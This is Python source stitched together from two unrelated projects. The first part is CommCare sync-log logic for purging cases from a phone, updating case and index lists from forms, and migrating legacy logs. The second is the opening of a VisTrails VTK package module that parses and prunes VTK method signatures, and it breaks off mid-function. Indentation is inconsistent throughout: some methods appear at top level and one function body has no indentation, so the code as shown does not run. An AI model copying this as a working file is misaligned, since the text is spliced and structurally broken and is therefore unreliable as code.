    return list(self.case_ids_on_phone)
@property
def primary_case_ids(self):
    # cases on the phone that are NOT there merely as dependencies
    return self.case_ids_on_phone - self.dependent_case_ids_on_phone
def purge(self, case_id):
    """
    This happens in 3 phases, and recursively tries to purge outgoing indices of purged cases.

    Definitions:
    -----------
    A case is *relevant* if:
    - it is open and owned or,
    - it has a relevant child or,
    - it has a relevant extension or,
    - it is the extension of a relevant case.

    A case is *available* if:
    - it is open and not an extension case or,
    - it is open and is the extension of an available case.

    A case is *live* if:
    - it is owned and available or,
    - it has a live child or,
    - it has a live extension or,
    - it is the extension of a live case.

    Algorithm:
    ----------
    1. Mark *relevant* cases
        Mark all open cases owned by the user relevant. Traversing all outgoing child
        and extension indexes, as well as all incoming extension indexes, mark all
        touched cases relevant.
    2. Mark *available* cases
        Mark all relevant cases that are open and have no outgoing extension indexes
        as available. Traverse incoming extension indexes which don't lead to closed
        cases, mark all touched cases as available.
    3. Mark *live* cases
        Mark all relevant, owned, available cases as live. Traverse incoming
        extension indexes which don't lead to closed cases, mark all touched
        cases as live.
    """
    logger.debug("purging: {}".format(case_id))
    # tentatively demote the case to dependent; it may be removed below
    self.dependent_case_ids_on_phone.add(case_id)
    relevant = self._get_relevant_cases(case_id)
    available = self._get_available_cases(relevant)
    live = self._get_live_cases(available)
    # anything relevant but not live can come off the phone
    to_remove = relevant - live
    self._remove_cases_purge_indices(to_remove, case_id)
def _get_relevant_cases(self, case_id):
    """
    Mark all open cases owned by the user relevant. Traversing all outgoing child
    and extension indexes, as well as all incoming extension indexes,
    mark all touched cases relevant.
    """
    relevant = IndexTree.get_all_dependencies(
        case_id,
        closed_cases=self.closed_cases,
        child_index_tree=self.index_tree,
        extension_index_tree=self.extension_index_tree,
        # pre-build the reverse maps so the traversal doesn't rebuild them
        cached_child_map=_reverse_index_map(self.index_tree.indices),
        cached_extension_map=_reverse_index_map(self.extension_index_tree.indices),
    )
    logger.debug("Relevant cases: {}".format(relevant))
    return relevant
def _get_available_cases(self, relevant):
    """
    Mark all relevant cases that are open and have no outgoing extension indexes
    as available. Traverse incoming extension indexes which don't lead to closed
    cases, mark all touched cases as available
    """
    incoming_extensions = _reverse_index_map(self.extension_index_tree.indices)
    # NOTE(review): a case with outgoing extension indices still counts as
    # available here when it also has outgoing child indices — confirm this
    # is the intended reading of the docstring.
    available = {case for case in relevant
                 if case not in self.closed_cases
                 and (not self.extension_index_tree.indices.get(case) or self.index_tree.indices.get(case))}
    new_available = set() | available
    while new_available:
        case_to_check = new_available.pop()
        # pull in open cases that are extensions of an available case
        for incoming_extension in incoming_extensions.get(case_to_check, []):
            if incoming_extension not in self.closed_cases:
                new_available.add(incoming_extension)
        available = available | new_available
    logger.debug("Available cases: {}".format(available))
    return available
def _get_live_cases(self, available):
    """
    Mark all relevant, owned, available cases as live. Traverse incoming
    extension indexes which don't lead to closed cases, mark all touched
    cases as live.
    """
    incoming_extensions = _reverse_index_map(self.extension_index_tree.indices)
    # start with available cases the phone actually owns (primary cases)
    live = {case for case in available if case in self.primary_case_ids}
    new_live = set() | live
    checked = set()
    while new_live:
        case_to_check = new_live.pop()
        checked.add(case_to_check)
        new_live = new_live | IndexTree.get_all_outgoing_cases(
            case_to_check,
            self.index_tree,
            self.extension_index_tree
        )
        new_live = new_live | IndexTree.traverse_incoming_extensions(
            case_to_check,
            self.extension_index_tree,
            self.closed_cases, cached_map=incoming_extensions
        )
        # don't revisit cases we've already expanded
        new_live = new_live - checked
        live = live | new_live
    logger.debug("live cases: {}".format(live))
    return live
def _remove_cases_purge_indices(self, all_to_remove, checked_case_id):
    """Remove all cases marked for removal. Traverse child cases and try to purge those too."""
    logger.debug("cases to to_remove: {}".format(all_to_remove))
    for to_remove in all_to_remove:
        # capture the indices before _remove_case pops them from the tree
        indices = self.index_tree.indices.get(to_remove, {})
        self._remove_case(to_remove, all_to_remove, checked_case_id)
        for referenced_case in indices.values():
            is_dependent_case = referenced_case in self.dependent_case_ids_on_phone
            already_primed_for_removal = referenced_case in all_to_remove
            if is_dependent_case and not already_primed_for_removal and referenced_case != checked_case_id:
                # the removed case may have been the last thing keeping this
                # dependent case around, so try purging it as well
                self.purge(referenced_case)
def _remove_case(self, to_remove, all_to_remove, checked_case_id):
    """Removes case from index trees, case_ids_on_phone and dependent_case_ids_on_phone if pertinent"""
    logger.debug('removing: {}'.format(to_remove))
    # pop the case's outgoing indices from both trees, keeping them for validation
    deleted_indices = self.index_tree.indices.pop(to_remove, {})
    deleted_indices.update(self.extension_index_tree.indices.pop(to_remove, {}))

    self._validate_case_removal(to_remove, all_to_remove, deleted_indices, checked_case_id)

    try:
        self.case_ids_on_phone.remove(to_remove)
    except KeyError:
        # the case was already gone; fail softly (or not at all for legacy domains)
        _assert = soft_assert(to=['czue' + '@' + 'dimagi.com'], exponential_backoff=False)
        should_fail_softly = _domain_has_legacy_toggle_set()
        if should_fail_softly:
            pass
        else:
            # this is only a soft assert for now because of http://manage.dimagi.com/default.asp?181443
            # we should convert back to a real Exception when we stop getting any of these
            _assert(False, 'case {} already removed from sync log {}'.format(to_remove, self._id))

    if to_remove in self.dependent_case_ids_on_phone:
        self.dependent_case_ids_on_phone.remove(to_remove)
def _validate_case_removal(self, case_to_remove, all_to_remove, deleted_indices, checked_case_id):
    """Traverse immediate outgoing indices. Validate that these are also candidates for removal."""
    if case_to_remove == checked_case_id:
        return

    for index in deleted_indices.values():
        if not _domain_has_legacy_toggle_set():
            # unblocking http://manage.dimagi.com/default.asp?185850#1039475
            _assert = soft_assert(to=['czue' + '@' + 'dimagi.com'], exponential_backoff=True,
                                  fail_if_debug=True)
            _assert(index in (all_to_remove | set([checked_case_id])),
                    "expected {} in {} but wasn't".format(index, all_to_remove))
def _add_primary_case(self, case_id):
    """Add a case as a primary (non-dependent) case on the phone."""
    self.case_ids_on_phone.add(case_id)
    if case_id in self.dependent_case_ids_on_phone:
        # promote: the case is now on the phone in its own right
        self.dependent_case_ids_on_phone.remove(case_id)
def _add_index(self, index, case_update):
    """Record a new index in the appropriate tree (extension vs child)."""
    logger.debug('adding index {} --<{}>--> {} ({}).'.format(
        index.case_id, index.relationship, index.referenced_id, index.identifier))
    if index.relationship == const.CASE_INDEX_EXTENSION:
        self._add_extension_index(index, case_update)
    else:
        self._add_child_index(index)
def _add_extension_index(self, index, case_update):
    """Record an extension index, pulling the referenced (host) case onto the phone if needed."""
    assert index.relationship == const.CASE_INDEX_EXTENSION
    self.extension_index_tree.set_index(index.case_id, index.identifier, index.referenced_id)

    if index.referenced_id not in self.case_ids_on_phone:
        # the host case comes along, but only as a dependent
        self.case_ids_on_phone.add(index.referenced_id)
        self.dependent_case_ids_on_phone.add(index.referenced_id)

    case_child_indices = [idx for idx in case_update.indices_to_add
                          if idx.relationship == const.CASE_INDEX_CHILD
                          and idx.referenced_id == index.referenced_id]
    if not case_child_indices and not case_update.is_live:
        # this case doesn't also have child indices, and it is not owned, so it is dependent
        self.dependent_case_ids_on_phone.add(index.case_id)
def _add_child_index(self, index):
    """Record a child index, pulling the referenced (parent) case onto the phone if needed."""
    assert index.relationship == const.CASE_INDEX_CHILD
    self.index_tree.set_index(index.case_id, index.identifier, index.referenced_id)
    if index.referenced_id not in self.case_ids_on_phone:
        # the parent case comes along, but only as a dependent
        self.case_ids_on_phone.add(index.referenced_id)
        self.dependent_case_ids_on_phone.add(index.referenced_id)
def _delete_index(self, index):
    # the identifier may live in either tree; deleting from the one that
    # doesn't contain it is a no-op
    self.index_tree.delete_index(index.case_id, index.identifier)
    self.extension_index_tree.delete_index(index.case_id, index.identifier)
    def update_phone_lists(self, xform, case_list):
        """Play the actions of `xform` over `case_list` and update the phone's
        case/index state accordingly.

        Phase 1 builds a CaseUpdate per case from the form's actions; phase 2
        applies "live" (owned, open) updates; phase 3/4 apply non-live
        updates, attempting to purge cases that are no longer needed.
        Saves the doc and invalidates cached payloads when anything changed.
        """
        made_changes = False
        logger.debug('updating sync log for {}'.format(self.user_id))
        logger.debug('case ids before update: {}'.format(', '.join(self.case_ids_on_phone)))
        logger.debug('dependent case ids before update: {}'.format(', '.join(self.dependent_case_ids_on_phone)))
        logger.debug('index tree before update: {}'.format(self.index_tree))

        # accumulator for everything this form does to a single case
        class CaseUpdate(object):
            def __init__(self, case_id, owner_ids_on_phone):
                self.case_id = case_id
                self.owner_ids_on_phone = owner_ids_on_phone
                self.was_live_previously = True
                self.final_owner_id = None
                self.is_closed = None
                self.indices_to_add = []
                self.indices_to_delete = []

            @property
            def extension_indices_to_add(self):
                return [index for index in self.indices_to_add
                        if index.relationship == const.CASE_INDEX_EXTENSION]

            def has_extension_indices_to_add(self):
                return len(self.extension_indices_to_add) > 0

            @property
            def is_live(self):
                """returns whether an update is live for a specific set of owner_ids"""
                if self.is_closed:
                    return False
                elif self.final_owner_id is None:
                    # we likely didn't touch owner_id so just default to whatever it was previously
                    return self.was_live_previously
                else:
                    return self.final_owner_id in self.owner_ids_on_phone

        ShortIndex = namedtuple('ShortIndex', ['case_id', 'identifier', 'referenced_id', 'relationship'])

        # this is a variable used via closures in the function below
        owner_id_map = {}

        def get_latest_owner_id(case_id, action=None):
            # "latest" just means as this forms actions are played through
            if action is not None:
                owner_id_from_action = action.updated_known_properties.get("owner_id")
                if owner_id_from_action is not None:
                    owner_id_map[case_id] = owner_id_from_action
            return owner_id_map.get(case_id, None)

        # phase 1: fold this form's actions into one CaseUpdate per case
        all_updates = {}
        for case in case_list:
            if case.case_id not in all_updates:
                logger.debug('initializing update for case {}'.format(case.case_id))
                all_updates[case.case_id] = CaseUpdate(case_id=case.case_id,
                                                      owner_ids_on_phone=self.owner_ids_on_phone)

            case_update = all_updates[case.case_id]
            case_update.was_live_previously = case.case_id in self.primary_case_ids
            actions = case.get_actions_for_form(xform)
            for action in actions:
                logger.debug('{}: {}'.format(case.case_id, action.action_type))
                owner_id = get_latest_owner_id(case.case_id, action)
                if owner_id is not None:
                    case_update.final_owner_id = owner_id
                if action.action_type == const.CASE_ACTION_INDEX:
                    for index in action.indices:
                        # an index action with no referenced_id means "delete this index"
                        if index.referenced_id:
                            case_update.indices_to_add.append(
                                ShortIndex(case.case_id, index.identifier, index.referenced_id, index.relationship)
                            )
                        else:
                            case_update.indices_to_delete.append(
                                ShortIndex(case.case_id, index.identifier, None, None)
                            )
                elif action.action_type == const.CASE_ACTION_CLOSE:
                    case_update.is_closed = True

        # phase 2: apply live updates, deferring the non-live ones
        non_live_updates = []
        for case in case_list:
            case_update = all_updates[case.case_id]
            if case_update.is_live:
                logger.debug('case {} is live.'.format(case_update.case_id))
                if case.case_id not in self.case_ids_on_phone:
                    self._add_primary_case(case.case_id)
                    made_changes = True
                elif case.case_id in self.dependent_case_ids_on_phone:
                    self.dependent_case_ids_on_phone.remove(case.case_id)
                    made_changes = True

                for index in case_update.indices_to_add:
                    self._add_index(index, case_update)
                    made_changes = True
                for index in case_update.indices_to_delete:
                    self._delete_index(index)
                    made_changes = True
            else:
                # process the non-live updates after all live are already processed
                non_live_updates.append(case_update)
                # populate the closed cases list before processing non-live updates
                if case_update.is_closed:
                    self.closed_cases.add(case_update.case_id)

        # phase 3: non-live cases with extension indices still need to be
        # tracked so their hosts are kept alive
        for update in non_live_updates:
            logger.debug('case {} is NOT live.'.format(update.case_id))
            if update.has_extension_indices_to_add():
                # non-live cases with extension indices should be added and processed
                self.case_ids_on_phone.add(update.case_id)
                for index in update.indices_to_add:
                    self._add_index(index, update)
                made_changes = True

        # phase 4: try to purge non-live cases; if a case survives the purge
        # (something still depends on it) apply the rest of its update
        for update in non_live_updates:
            if update.case_id in self.case_ids_on_phone:
                # try purging the case
                self.purge(update.case_id)
                if update.case_id in self.case_ids_on_phone:
                    # if unsuccessful, process the rest of the update
                    for index in update.indices_to_add:
                        self._add_index(index, update)
                    for index in update.indices_to_delete:
                        self._delete_index(index)
                made_changes = True

        logger.debug('case ids after update: {}'.format(', '.join(self.case_ids_on_phone)))
        logger.debug('dependent case ids after update: {}'.format(', '.join(self.dependent_case_ids_on_phone)))
        logger.debug('index tree after update: {}'.format(self.index_tree))
        logger.debug('extension index tree after update: {}'.format(self.extension_index_tree))
        if made_changes or case_list:
            try:
                if made_changes:
                    logger.debug('made changes, saving.')
                    self.last_submitted = datetime.utcnow()
                    self.rev_before_last_submitted = self._rev
                    self.save()
                if case_list:
                    try:
                        self.invalidate_cached_payloads()
                    except ResourceConflict:
                        # this operation is harmless so just blindly retry and don't
                        # reraise if it goes through the second time
                        SimplifiedSyncLog.get(self._id).invalidate_cached_payloads()
            except ResourceConflict:
                logging.exception('doc update conflict saving sync log {id}'.format(
                    id=self._id,
                ))
                raise
def purge_dependent_cases(self):
"""
Attempt to purge any dependent cases from the sync log.
"""
# this is done when migrating from old formats or during initial sync
# to purge non-relevant dependencies
for dependent_case_id in list(self.dependent_case_ids_on_phone):
# need this additional check since the case might have already been purged/remove
# as a result of purging the child case
if dependent_case_id in self.dependent_case_ids_on_phone:
# this will be a no-op if the case cannot be purged due to dependencies
self.purge(dependent_case_id)
    @classmethod
    def from_other_format(cls, other_sync_log):
        """
        Migrate from the old SyncLog format to this one.

        Copies the case footprint and index edges from the legacy document,
        purges no-longer-relevant dependent cases, strips legacy-only
        fields, and keeps a snapshot of the original in `migrated_from`.
        """
        if isinstance(other_sync_log, SyncLog):
            previous_log_footprint = set(other_sync_log.get_footprint_of_cases_on_phone())

            def _add_state_contributions(new_sync_log, case_state, is_dependent=False):
                # only carry over cases that were actually in the old footprint
                if case_state.case_id in previous_log_footprint:
                    new_sync_log.case_ids_on_phone.add(case_state.case_id)
                    for index in case_state.indices:
                        new_sync_log.index_tree.set_index(case_state.case_id, index.identifier,
                                                          index.referenced_id)
                    if is_dependent:
                        new_sync_log.dependent_case_ids_on_phone.add(case_state.case_id)

            ret = cls.wrap(other_sync_log.to_json())
            for case_state in other_sync_log.cases_on_phone:
                _add_state_contributions(ret, case_state)

            dependent_case_ids = set()
            for case_state in other_sync_log.dependent_cases_on_phone:
                if case_state.case_id in previous_log_footprint:
                    _add_state_contributions(ret, case_state, is_dependent=True)
                    dependent_case_ids.add(case_state.case_id)

            # try to purge any dependent cases - the old format does this on
            # access, but the new format does it ahead of time and always assumes
            # its current state is accurate.
            ret.purge_dependent_cases()

            # set and cleanup other properties
            ret.log_format = LOG_FORMAT_SIMPLIFIED
            del ret['last_seq']
            del ret['cases_on_phone']
            del ret['dependent_cases_on_phone']
            ret.migrated_from = other_sync_log.to_json()
            return ret
        else:
            return super(SimplifiedSyncLog, cls).from_other_format(other_sync_log)
def tests_only_get_cases_on_phone(self):
# hack - just for tests
return [CaseState(case_id=id) for id in self.case_ids_on_phone]
def test_only_clear_cases_on_phone(self):
self.case_ids_on_phone = set()
def test_only_get_dependent_cases_on_phone(self):
# hack - just for tests
return [CaseState(case_id=id) for id in self.dependent_case_ids_on_phone]
def _domain_has_legacy_toggle_set():
    """Whether the requesting domain still needs legacy sync behavior.

    Old versions of CommCare (roughly < 2.10) didn't purge on form
    completion, so they can still modify cases that should no longer be
    on the phone.
    """
    domain = get_request_domain()
    if not domain:
        return False
    return LEGACY_SYNC_SUPPORT.enabled(domain)
def get_sync_log_doc(doc_id):
    """Fetch the raw sync log document, falling back to the legacy DB.

    Legacy docs are fetched with attachments and have their revision
    stripped so they can be re-saved into the new database.
    """
    try:
        return SyncLog.get_db().get(doc_id)
    except ResourceNotFound:
        doc = get_db(None).get(doc_id, attachments=True)
        del doc['_rev']  # remove the rev so we can save this to the new DB
        return doc
def get_properly_wrapped_sync_log(doc_id):
    """
    Looks up and wraps a sync log, using the class based on the 'log_format'
    attribute.  Defaults to the existing legacy SyncLog class.
    """
    doc = get_sync_log_doc(doc_id)
    return properly_wrap_sync_log(doc)
def properly_wrap_sync_log(doc):
    """Wrap a raw doc with the sync log class its 'log_format' selects."""
    log_class = get_sync_log_class_by_format(doc.get('log_format'))
    return log_class.wrap(doc)
def get_sync_log_class_by_format(format):
    """Map a 'log_format' value to its sync log class (legacy by default)."""
    format_map = {
        LOG_FORMAT_LEGACY: SyncLog,
        LOG_FORMAT_SIMPLIFIED: SimplifiedSyncLog,
    }
    return format_map.get(format, SyncLog)
class OwnershipCleanlinessFlag(models.Model):
    """
    Stores whether an owner_id is "clean" aka has a case universe only belonging
    to that ID.

    We use this field to optimize restores.
    """
    # the domain / owner pair this flag applies to (unique together, see Meta)
    domain = models.CharField(max_length=100, db_index=True)
    owner_id = models.CharField(max_length=100, db_index=True)
    # whether the owner's case universe is currently believed to be clean
    is_clean = models.BooleanField(default=False)
    # refreshed automatically on every save() (see override below)
    last_checked = models.DateTimeField()
    # extra context about the cleanliness determination
    # (presumably a case/owner id explaining why it isn't clean -- confirm with callers)
    hint = models.CharField(max_length=100, null=True, blank=True)

    def save(self, force_insert=False, force_update=False, using=None,
             update_fields=None):
        # stamp the check time on every save so last_checked is always current
        self.last_checked = datetime.utcnow()
        super(OwnershipCleanlinessFlag, self).save(force_insert, force_update, using, update_fields)

    @classmethod
    def get_for_owner(cls, domain, owner_id):
        # fetch-or-create the flag row for this (domain, owner) pair
        return cls.objects.get_or_create(domain=domain, owner_id=owner_id)[0]

    class Meta:
        app_label = 'phone'
        unique_together = [('domain', 'owner_id')]
| |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
################################################################################
# VTK Package for VisTrails
################################################################################
from core.bundles import py_import
vtk = py_import('vtk', {'linux-ubuntu': 'python-vtk',
'linux-fedora': 'vtk-python'})
from core.utils import all, any, VistrailsInternalError, InstanceObject
from core.debug import debug
from core.modules.basic_modules import Integer, Float, String, File, \
Variant, Color, Boolean, identifier as basic_pkg
from core.modules.module_registry import get_module_registry
from core.modules.vistrails_module import new_module, ModuleError
from core.vistrail.connection import Connection
from base_module import vtkBaseModule
from class_tree import ClassTree
from vtk_parser import VTKMethodParser
import re
import os.path
from itertools import izip
from vtkcell import VTKCell
import tf_widget
import offscreen
import fix_classes
import inspectors
from hasher import vtk_hasher
import operator
import re
import sys
from core.upgradeworkflow import UpgradeWorkflowHandler
#TODO: Change the Core > Module > Registry > Add Input : To support vector as type.
################################################################################
# filter some deprecation warnings coming from the fact that vtk calls
# range() with float parameters
import warnings
# Silence the DeprecationWarning raised when VTK passes floats where
# Python expects integer arguments (see the comment above).
warnings.filterwarnings("ignore",
                        message="integer argument expected, got float")
################################################################################
# Determine the installed VTK version once at import time.
v = vtk.vtkVersion()
version = [v.GetVTKMajorVersion(),
           v.GetVTKMinorVersion(),
           v.GetVTKBuildVersion()]

# On VTK 5.0.4 and later the fix_classes.description table is keyed by the
# id of the class, because it seems that VTK hasn't implemented hash()
# correctly for their classes; older versions key by the class itself.
if version < [5, 0, 4]:
    def _description_key(klass):
        return klass
else:
    _description_key = id


def get_description_class(klass):
    """Because sometimes we need to patch VTK classes, the klass that
    has the methods is different than the klass we want to
    instantiate. get_description_class makes sure that for patched
    classes we get the correct one."""
    try:
        return fix_classes.description[_description_key(klass)]
    except KeyError:
        return klass
# Shared parser instance used by addPorts() to enumerate VTK class methods.
parser = VTKMethodParser()

# Maps C/C++ argument type names (as parsed out of VTK docstrings) to
# VisTrails port types.  The '[float' / 'float]' / '[int' / 'int]' keys
# match the bracketed tokens produced when a grouped parameter list is
# flattened (see prune_signatures).
typeMapDict = {'int': Integer,
               'long': Integer,
               'float': Float,
               'char*': String,
               'char *': String,
               'string': String,
               'char': String,
               'const char*': String,
               'const char *': String,
               '[float': Float,
               'float]': Float,
               '[int': Integer,
               'int]': Integer}
# The "basic" port types; used to decide whether a port is optional.
typeMapDictValues = [Integer, Float, String]

# Recognize file-name accessors (e.g. SetFileName) so they can also be
# exposed as VisTrails File ports.
file_name_pattern = re.compile('.*FileName$')
set_file_name_pattern = re.compile('Set.*FileName$')
def resolve_overloaded_name(name, ix, signatures):
    """Return a unique port name for overload `ix` of method `name`.

    VTK supports static overloading, VisTrails does not, so when a method
    has several signatures each overload gets a 1-based numeric suffix
    (e.g. the second overload of 'SetValue' becomes 'SetValue_2').
    """
    if len(signatures) == 1:
        return name
    return '%s_%d' % (name, ix + 1)
def typeMap(name, package=None):
    """ typeMap(name: str) -> Module
    Convert from C/C++ types into VisTrails Module type

    `name` may also be a tuple of type names, in which case a list of
    resolved types is returned (one entry per element).  Returns None when
    the name is neither a known primitive nor a descriptor registered
    under `package` (defaults to this package's identifier).
    """
    if package is None:
        package = identifier
    # isinstance instead of type(...) == tuple: also accepts tuple
    # subclasses (e.g. namedtuples) and is the idiomatic check
    if isinstance(name, tuple):
        return [typeMap(x, package) for x in name]
    if name in typeMapDict:
        return typeMapDict[name]
    registry = get_module_registry()
    if not registry.has_descriptor_with_name(package, name):
        return None
    return registry.get_descriptor_by_name(package, name).module
def get_method_signature(method, docum='', name=''):
    """ get_method_signature(method: vtkmethod) -> [ret, arg]
    Re-wrap Prabu's method to increase performance

    Parses the VTK-generated docstring of `method` (or `docum`, if given)
    and returns one ([return_types], arg_types) pair per overload.  Type
    names are extracted by quoting the identifiers in the signature text
    and eval()-ing it -- overloads whose text can't be eval'd are skipped.
    """
    doc = method.__doc__ if docum=='' else docum
    tmptmp = doc.split('\n')
    tmp = []
    # Keep only the 'V.<name>(...)' and 'C++: ...' signature lines; glue
    # continuation lines back onto the previous signature.
    for l in tmptmp:
        l = l.strip('\n \t')
        if l.startswith('V.') or l.startswith('C++:'):
            tmp.append(l)
        else:
            if (len(tmp) != 0):
                tmp[-1] = tmp[-1] + ' ' + l
    tmp.append('')  # sentinel so the loop below can stop on ''
    sig = []
    # pattern matching word boundaries: used to wrap identifiers in quotes
    pat = re.compile(r'\b')

    # Remove all the C++ function signatures and V.<method_name> field
    name = method.__name__ if name == '' else name
    offset = 2+len(name)  # skip the leading 'V.<name>' prefix
    for i in xrange(len(tmp)):
        s = tmp[i]
        if s=='': break
        # signatures alternate V./C++: lines; even indices are the Python ones
        if i%2==0:
            x = s.split('->')
            arg = x[0].strip()[offset:]
            if len(x) == 1: # No return value
                ret = None
            else:
                ret = x[1].strip()

            # Remove leading and trailing parens for arguments.
            arg = arg[1:-1]
            if not arg:
                arg = None
            if arg and arg[-1] == ')':
                # re-balance a trailing tuple so eval sees a tuple literal
                arg = arg + ','

            # Now quote the args and eval them. Easy!
            if ret and ret[:3]!='vtk':
                try:
                    ret = eval(pat.sub('\"', ret))
                except:
                    continue
            if arg:
                if arg.find('(')!=-1:
                    try:
                        arg = eval(pat.sub('\"', arg))
                    except:
                        continue
                else:
                    arg = arg.split(', ')
                    if len(arg)>1:
                        arg = tuple(arg)
                    else:
                        arg = arg[0]
                if type(arg) == str:
                    arg = [arg]
            sig.append(([ret], arg))
    return sig
def prune_signatures(module, name, signatures, output=False):
    """prune_signatures tries to remove redundant signatures to reduce
    overloading. It _mutates_ the given parameter.

    It does this by performing several operations:

    1) It compares a 'flattened' version of the types
    against the other 'flattened' signatures. If any of them match, we
    keep only the 'flatter' ones.

    A 'flattened' signature is one where parameters are not inside a
    tuple.

    2) We explicitly forbid a few signatures based on modules and names
    """
    # yeah, this is Omega(n^2) on the number of overloads. Who cares?
    def flatten(type_):
        # Turn a (possibly nested) argument spec into a flat list of type
        # names, marking grouped parameters with '[' / ']' brackets.
        if type_ is None:
            return []
        def convert(entry):
            if type(entry) == tuple:
                return list(entry)
            elif type(entry) == str:
                return [entry]
            else:
                result = []
                first = True
                lastList = True
                for e in entry:
                    if (type(e) == list):
                        # BUG FIX: this used to be
                        #   result[len(result)] = result[len(result)] + ']'
                        # which always raises IndexError (index == len);
                        # the intent is to close the bracket on the last
                        # element already emitted.
                        if lastList == False: result[-1] = result[-1] + ']'
                        aux = e
                        aux.reverse()
                        aux[0] = '[' + aux[0]
                        aux[-1] = aux[-1] + ']'
                        result.extend(aux)
                        lastList = True
                    else:
                        # NOTE(review): only the first bare element gets an
                        # opening bracket and a trailing run is never closed;
                        # since flatten output is only compared for equality
                        # this is consistent, so it is left as-is.
                        if first: e = '[' + e
                        result.append(e)
                        lastList = False
                    first = False
                return result
        result = []
        for entry in type_:
            result.extend(convert(entry))
        return result
    flattened_entries = [flatten(sig[1]) for
                         sig in signatures]

    def hit_count(entry):
        # Number of signatures whose flattened form matches this one.
        # BUG FIX: the original shadowed the parameter with the loop
        # variable ('for entry in flattened_entries: if entry in
        # flattened_entries'), so it always returned
        # len(flattened_entries).  That made every unique non-flat
        # signature look overloaded and therefore prunable, contradicting
        # the documented rule of only pruning when flattened forms match.
        return flattened_entries.count(entry)
    hits = [hit_count(entry) for entry in flattened_entries]

    def forbidden(flattened, hit_count, original):
        if (issubclass(get_description_class(module.vtkClass), vtk.vtk3DWidget) and
            name == 'PlaceWidget' and
            flattened == []):
            return True
        # We forbid this because addPorts hardcodes this but
        # SetInputArrayToProcess is an exception for the InfoVis
        # package
        if (get_description_class(module.vtkClass) == vtk.vtkAlgorithm and
            name!='SetInputArrayToProcess'):
            return True
        return False

    # This is messy: a signature is only allowed if there's no
    # explicit disallowing of it. Then, if it's not overloaded,
    # it is also allowed. If it is overloaded and not the flattened
    # version, it is pruned. If these are output ports, there can be
    # no parameters.
    def passes(flattened, hit_count, original):
        if forbidden(flattened, hit_count, original):
            return False
        if hit_count == 1:
            return True
        if original[1] is None:
            return True
        if output and len(original[1]) > 0:
            return False
        if hit_count > 1 and len(original[1]) == len(flattened):
            return True
        return False

    signatures[:] = [original for (flattened, hit_count, original)
                     in izip(flattened_entries,
                             hits,
                             signatures)
                     if passes(flattened, hit_count, original)]

    #then we remove the duplicates, if necessary
    unique_signatures = []

    #Remove the arrays and tuples inside the signature
    # in order to transform it in a single array
    #Also remove the '[]' from the Strings
    def removeBracts(signatures):
        result = []
        stack = list(signatures)
        while (len(stack) != 0):
            curr = stack.pop(0)
            # NOTE(review): 'type(curr) == String' can never be true for the
            # String *class* itself (its type is the metaclass); kept as-is
            # because changing it would alter which signatures dedupe.
            if (type(curr) == String or type(curr) == str):
                c = curr.replace('[', '')
                c = c.replace(']', '')
                result.append(c)
            elif (curr == None):
                result.append(curr)
            elif (type(curr) == list):
                curr.reverse()
                for c in curr: stack.insert(0, c)
            elif (type(curr) == tuple):
                cc = list(curr)
                cc.reverse()
                for c in cc: stack.insert(0, c)
            else:
                result.append(curr)
        return result

    unique2 = []
    for s in signatures:
        aux = removeBracts(s)
        if not unique2.count(aux):
            unique_signatures.append(s)
            unique2.append(aux)
    signatures[:] = unique_signatures
# VTK classes that must not be wrapped as VisTrails modules: utility /
# infrastructure classes, plus classes known to break for specific VTK
# releases.
disallowed_classes = {
    'vtkCriticalSection',
    'vtkDataArraySelection',
    'vtkDebugLeaks',
    'vtkDirectory',
    'vtkDynamicLoader',
    'vtkFunctionParser',
    'vtkGarbageCollector',
    'vtkHeap',
    'vtkInformationKey',
    'vtkInstantiator',
    'vtkLogLookupTable',  # VTK: use vtkLookupTable.SetScaleToLog10() instead
    'vtkMath',
    'vtkModelMetadata',
    'vtkMultiProcessController',
    'vtkMutexLock',
    'vtkOutputWindow',
    'vtkPriorityQueue',
    'vtkReferenceCount',
    'vtkRenderWindowCollection',
    'vtkRenderWindowInteractor',
    'vtkTesting',
    'vtkWindow',
    'vtkContext2D',        # Not working for VTK 5.7.0
    'vtkPLYWriter',        # Not working for VTK 5.7.0.
    'vtkBooleanTexture',   # Not working for VTK 5.7.0
    'vtkImageMaskBits',    # Not working for VTK 5.7.0
    'vtkHardwareSelector', # Not working for VTK 5.7.0
}
def is_class_allowed(module):
    """Whether `module` may be exposed as a port type.

    None is never allowed; objects without a __name__ (e.g. port spec
    tuples) are always allowed; otherwise the class name must not be in
    the disallowed list.
    """
    if module is None:
        return False
    try:
        class_name = module.__name__
    except AttributeError:
        return True
    return class_name not in disallowed_classes
def addAlgorithmPorts(module):
    """ addAlgorithmPorts(module: Module) -> None
    If module is a subclass of vtkAlgorithm, this function will add all
    SetInputConnection([id],[port]) and GetOutputPort([id]) as
    SetInputConnection{id}([port]) and GetOutputPort{id}.

    """
    if issubclass(get_description_class(module.vtkClass), vtk.vtkAlgorithm):
        # vtkStructuredPointsGeometryFilter is skipped
        # (presumably instantiating/porting it is problematic -- confirm)
